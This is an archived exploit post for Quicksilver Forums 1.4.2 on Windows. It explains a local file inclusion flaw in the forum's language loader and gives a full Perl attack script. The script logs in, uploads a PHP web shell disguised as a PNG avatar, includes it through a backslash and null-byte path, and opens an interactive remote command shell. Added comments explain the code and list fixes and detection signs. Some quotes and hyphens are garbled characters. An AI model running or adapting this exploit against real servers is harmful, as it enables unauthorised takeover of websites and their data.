Quicksilver Forums 1.4.2 RCE Exploit windows only

   1    # Author:            __GiReX__
   2    # Homepage:          girex.altervista.org
   3
   4    # Date:              24/11/2008
   5
   6    # CMS:               Quicksilver Forums <= 1.4.2
   7    # Site:              http://www.quicksilverforums.com/
   8
   9    # Bug:               Local File Inclusion
   10   # Exploit:           Remote Command Execution
   11
   12   # Note:              Works with windows servers only
   13                        Works regardless of php.ini settings
   14
   15   # Bug Discussion:
   16
   17   # file: global.php
   18   # lines: 318-329
   19
   20             function get_lang($lang, $a = null, $path = ’./’, $main = true)
   21             {
   22                     if (isset($this−>get[’lang’])) {
   23                             $lang = $this−>get[’lang’];
   24
   25                        }
   26
   27                        if (strstr($lang, ’/’) || !file_exists($path . ’languages/’ . $lang . ’.php’)) {
   28                                $lang = ’en’;
   29                        }
   30
   31                        include $path . ’languages/’ . $lang . ’.php’;
   32
   33   # As you can see, Quicksilver's filter can be easily bypassed on Windows servers
   34   # because of the use of backslashes "\" in filesystem paths.
   35
   36   # Thanks to the function uset_magic_quotes_gpc(), this vuln works regardless of the php.ini setting
   37
   38   # We can upload a malicious avatar and include it to achieve RCE
   39
   40
   41   #!/usr/bin/perl
   42   # Quicksilver Forums <= 1.4.2 RCE Exploit (win only)
   43   # Local File Inclusion / Malicious Avatar Upload
   44   # Coded by __GiReX__
   45
   46   use IO::Socket::INET;
   47   use MIME::Base64;
   48
   49   if(@ARGV < 3)
   50   {
        # Usage guard.  It only requires three arguments although four
        # ($host, $path, $user, $pass) are unpacked below, so a missing
        # <your_pass> slips through this check and $pass stays undef.
   51       banner();
   52       print "[+] You need an user account to run this exploit\n\n";
   53       print "[+] Usage: perl $0 <host> <path> <your_username> <your_pass>\n";
   54       print "[+] Example: perl $0 localhost /quick/ test password\n";
   55       exit;
   56   }
   57
   58   my ($host, $path, $user, $pass) = @ARGV;
        # No `use strict`/`use warnings` in this file: $target, $cookie, $sd,
        # $out, $debug, $prefix and $user_id below are package globals shared
        # with the subs further down.
   59
   60   $host =~ s/^http:\/\///;
   61   $host =~ s/^www\.//;
        # $target is an absolute URL; it is used verbatim as the request-line
        # target in every request below (absolute-form, not just the path).
   62   $target = "http://${host}${path}";
   63
   64   banner();
   65   check_vuln();
   66
        # do_login() returns the forum's cookie string or undef; debug() never
        # returns (it writes debug.txt and exits).
   67   $cookie = do_login() or debug($debug, 1);
   68   upload_avatar() or debug($debug, 2);
   69
        # Interactive loop.  Each command is shipped base64-encoded in a `CMD:`
        # request header on a GET whose `lang` parameter walks, with
        # backslashes and a trailing %00, to the "avatar" stored by
        # upload_avatar(); the PHP stub inside that file runs the command and
        # brackets its output with -code- / -code markers, which is what the
        # substr()/index() extraction below relies on.
        # Detection notes: a request header named CMD, a `lang=` value
        # containing `..\` or `%00`, and a response body bracketed by `-code-`
        # are all high-signal indicators for access-log review or WAF rules.
   70   while(1)
   71   {
   72            print "[+] shell\@quick:\$ ";
   73            chomp(my $cmd = <STDIN>);
   74
   75            exit if $cmd eq ’exit’;
   76            create_socket();
   77
   78            print $sd     "GET ${target}index.php?lang=..\\avatars\\uploaded\\${user_id}.png%00 HTTP/1.1\r\n".
   79                                    "Host: $host\r\n".
   80                                    "Cookie: $cookie\r\n".
   81                                    "CMD: ". encode_base64($cmd)."\r\n".
   82                                    "Connection: keep−alive\r\n\r\n";
   83
                 # Read the whole response to EOF into the global $out.
   84            $out .= $_ while <$sd>;
   85
   86            if($out =~ /−code−/)
   87            {
                         # Everything between the first "-code-" and the next
                         # "-code" is taken as the command output.
   88                    $_out = substr($out, index($out, ’−code−’) + 6);                     $n = index($_out, ’−code’);
   89                    $__out = substr($_out, 0, $n);
   90            }
   91            else
   92            {
                         # No marker found.  $out is passed but debug() prints the
                         # global $debug, not its argument; the call exits.
   93                    debug($out, 3);
   94            }
   95
   96            close($sd);
   97            $out = undef;
   98
   99            print STDOUT "\n". $__out."\n";
  100   }
  101
  102   sub check_vuln
  103   {
        # Probe for the traversal: requests `lang=..\languages\en.php%00`,
        # i.e. the default language file reached through a backslash path
        # instead of the expected bare name.  A PHP "Fatal error" fragment in
        # the reply is taken as the vulnerable signal (return 1).  $ok is set
        # only on a "404 Not Found" line: if the loop ends with $ok undefined
        # the script prints "not vulnerable" and exits, and on a 404 it falls
        # through to debug(..., 0), which also exits.  Every response line that
        # does not match the fatal-error pattern is appended to the global
        # $debug.
        #
        # Server-side fix (global.php get_lang): reject `\` as well as `/`
        # (better: canonicalise and require the result to sit under
        # languages/), and reject NUL bytes - on the PHP versions this targets
        # the embedded NUL presumably truncates the path before the appended
        # ".php", which is what lets file_exists() succeed on a foreign file.
  104           create_socket();
  105
  106            print $sd      "GET ${target}index.php?lang=..\\languages\\en.php%00 HTTP/1.1\r\n".
  107                                           "Host: $host\r\n".
  108                                           "Connection: keep−alive\r\n\r\n";
  109
  110            while(my $res = <$sd>)
  111            {
  112                    $ok = 1 if $res =~ /404 Not Found/;
  113
  114                      if($res =~ /<b>Fatal error<\/b>/)
  115                      {
  116                              close($sd);
  117                              return 1;
  118                      }
  119
                           # `our` only declares the package variable here; the
                           # same $debug is what debug() writes to debug.txt.
  120                      our $debug .= $res;
  121            }
  122
  123            print STDOUT "\n[−] Server not vulnerable, maybe it’s not a win server!\n" and exit
  124            if not defined $ok;
  125
  126            debug($debug, 0);
  127   }
  128
  129
  130   sub do_login
  131   {
        # Logs in with the account given on the command line and returns the
        # cookie string the later requests need, or undef on failure.
        # Side effects: the first `<prefix>_user=<id>` Set-Cookie seen fills the
        # globals $prefix and $user_id (the main loop builds the avatar path
        # from $user_id); every response line that does not end the loop is
        # appended to the global $debug, so debug.txt ends up holding response
        # headers including the `_user` cookie - treat that file as sensitive.
        # $user and $pass are interpolated into the form body without
        # URL-encoding, so credentials containing &, =, % or + are sent wrong.
  132       create_socket();
  133            my $data = "user=${user}&pass=${pass}&request_uri=%2F${path}%2Findex.php&submit=Invia";
  134
                 # Content-Length counts $data only; the trailing "\r\n\r\n" is
                 # sent outside the declared body.
  135            print $sd      "POST ${target}index.php?a=login&s=on HTTP/1.1\r\n" .
  136                                           "Host: $host\r\n" .
  137                                           "Connection: keep−alive\r\n" .
  138                                           "Content−Type: application/x−www−form−urlencoded\r\n" .
  139                                           "Content−Length: ". length($data)."\r\n\r\n" .
  140                                           $data . "\r\n\r\n";
  141
  142
  143
  144            while(my $res = <$sd>)
  145            {
  146                    if($res =~ /Set−Cookie: (\w+)_user=([0−9]+)/)
  147                    {
  148                        $prefix = $1 unless $prefix;
  149                        $user_id = $2 unless $user_id;
  150                    }
  151                    elsif($res =~ /Set−Cookie: \w+_pass=([a−z0−9]{32})/)
  152                    {
                                 # The `_pass` cookie is a 32-hex value (presumably
                                 # a password hash) that the forum accepts as the
                                 # login credential, so a leaked cookie stays valid
                                 # until the password changes - an application
                                 # weakness worth noting in its own right.
  153                            my $hash_pwd = $1; close($sd);
  154                            print STDOUT "\n[+] Logged in with $user account\n";
  155
  156                                 return "${prefix}_user=${user_id}; ${prefix}_pass=${hash_pwd};";
  157                     }
  158
  159                     our $debug .= $res;
  160           }
  161
  162           close($sd);
  163           return undef;
  164   }
  165
  166   sub upload_avatar
  167   {
        # Uploads the "avatar" through the control panel (a=cp&s=avatar) using
        # the cookie from do_login(); returns 1 when the reply contains
        # "Your avatar has been updated", undef otherwise.  Response lines are
        # accumulated into the global $debug as in the other subs.
  168            create_socket();
  169   # $data is the base64 of a complete multipart/form-data body: the
        # user_avatar_width/height/type fields plus an "avatar_upload" file
        # part declared as image/png with a .png filename.  That part is not
        # image data; it is the small PHP stub the main loop talks to (it runs
        # the base64-decoded CMD request header and wraps the output in the
        # -code- / -code markers).  The upload handler therefore accepted the
        # file on its declared type/extension alone.
        # Server-side fix: validate avatars by content (e.g. getimagesize() or
        # re-encode through an image library), keep them out of any path that
        # include() can reach, and reject files containing "<?".
        # Detection: a stored avatar beginning with "<?php", or an image/png
        # part whose body is plain text.
        # Note: in this rendering the boundary dashes in the Content-Type line
        # below appear as U+2212 while the decoded body uses ASCII hyphens;
        # that is an artifact of the document, not of the original script.
  170       my $data =    "LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0yMjY0ODI3NDQ2MjM4MDUNCk".
  171                      "NvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0idXNlcl9hdmF".
  172                      "0YXJfd2lkdGgiDQoNCjUwDQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t".
  173                      "LTIyNjQ4Mjc0NDYyMzgwNQ0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kY".
  174                      "XRhOyBuYW1lPSJ1c2VyX2F2YXRhcl9oZWlnaHQiDQoNCjUwDQotLS0tLS0tLS".
  175                      "0tLS0tLS0tLS0tLS0tLS0tLS0tLTIyNjQ4Mjc0NDYyMzgwNQ0KQ29udGVudC1E".
  176                      "aXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ1c2VyX2F2YXRhcl90eXBlI".
  177                      "g0KDQp1cGxvYWQNCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMjI2ND".
  178                      "gyNzQ0NjIzODA1DQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5".
  179                      "hbWU9ImF2YXRhcl91cGxvYWQiOyBmaWxlbmFtZT0iYXZhdF9hci5wbmciDQpD".
  180                      "b250ZW50LVR5cGU6IGltYWdlL3BuZw0KDQo8P3BocA0KaWYoaXNzZXQoJF9TRV".
  181                      "JWRVJbJ0hUVFBfQ01EJ10pKQp7CmVjaG8gIi1jb2RlLSI7IHBhc3N0aHJ1KGJ".
  182                      "hc2U2NF9kZWNvZGUoJF9TRVJWRVJbJ0hUVFBfQ01EJ10pKTsgZWNobyAiLWNv".
  183                      "ZGUiOwp9DQpkaWUoKTsNCj8+DQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tL".
  184                      "S0tLTIyNjQ4Mjc0NDYyMzgwNQ0KQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS".
  185                      "1kYXRhOyBuYW1lPSJzdWJtaXQiDQoNClN1Ym1pdA0KLS0tLS0tLS0tLS0tLS0t".
  186                      "LS0tLS0tLS0tLS0tLS0yMjY0ODI3NDQ2MjM4MDUtLQ0K";
  187
  188           $data = decode_base64($data);
  189
                # Content-Length counts $data only; the trailing "\r\n\r\n" is
                # sent outside the declared body.
  190           print $sd    "POST ${target}index.php?a=cp&s=avatar HTTP/1.1\r\n".
  191                                   "Host: $host\r\n" .
  192                                   "Connection: keep−alive\r\n" .
  193                                   "Cookie: $cookie\r\n" .
  194                    "Content−Type: multipart/form−data; boundary=−−−−−−−−−−−−−−−−−−−−−−−−−−−226482744623805\r\n" .
  195                    "Content−Length: ". length($data)."\r\n\r\n" .
  196                                   $data . "\r\n\r\n";
  197
  198
  199           while(my $res = <$sd>)
  200           {
  201                   if($res =~ /Your avatar has been updated/)
  202                   {
  203                           print "[+] Malicious avatar uploaded\n\n"; close($sd);
  204                           return 1;
  205                   }
  206
  207                     our $debug         .= $res;
  208           }
  209
  210             close($sd);
  211             return undef;
  212   }
  213
  214   sub create_socket
  215   {
        # Opens a plain TCP connection to $host on port 80 (hard-coded: no
        # TLS, no alternative port) and stores the handle in the package global
        # $sd; with no `use strict` in the file every other sub reads and
        # writes that same global.  Indirect-object `new Class(...)` syntax;
        # IO::Socket::INET reports connect failures in $@, which `die $@`
        # surfaces.
  216            our $sd = new IO::Socket::INET( ’PeerAddr’ => $host,
  217                                                                                                    ’PeerPort’ => ’80’,
  218                                                                                                    ’Proto’     => ’tcp’,
  219                                                                                               ) or die $@;
  220   }
  221
  222   sub debug
  223   {
        # Failure handler: writes the accumulated global $debug to debug.txt in
        # the current directory, prints a message selected by $errno and exits.
        # $output is taken off @_ but never used - the file always receives the
        # global, not the caller's argument (the main loop passes $out here).
        # The open() is unchecked and uses a bareword handle; debug.txt holds
        # raw response headers (including cookies), so treat it as sensitive.
  224           my $output = shift;
  225           my $errno = shift;
  226
  227             open(DEBUG, ’>’, ’debug.txt’);
  228             print DEBUG $debug;
  229
  230             if($errno eq ’0’)
  231             {
  232                     print STDOUT       "\n[−] Unable to request index.php! See debug.txt for more infos\n";
  233             }
  234             if($errno eq ’1’)
  235             {
  236                     print STDOUT       "\n[−] Unable to login! See debug.txt for more infos.\n";
  237             }
  238             elsif($errno eq ’2’)
  239             {
  240                     print STDOUT       "\n[−] Unable to upload avatar! See debug.txt for more infos.\n";
  241             }
  242             elsif($errno eq ’3’)
  243             {
  244                     print STDOUT       "\n[−] Exploit mistake! See debug.txt for more infos.\n";
  245             }
  246
  247             close(DEBUG);
  248             exit;
  249   }
  250
  251   sub banner
  252   {
        # Prints the tool banner to STDOUT; callers ignore the return value.
  253           print STDOUT "\n[+] Quicksilver Forums <= 1.4.2 RCE Exploit (win only)\n".
  254                                         "[+] Local File Inclusion / Malicious Avatar Upload\n".
  255                                         "[+] Coded by __GiReX__\n\n";
  256   }
  257
   258   # milw0rm.com [2008-11-24]

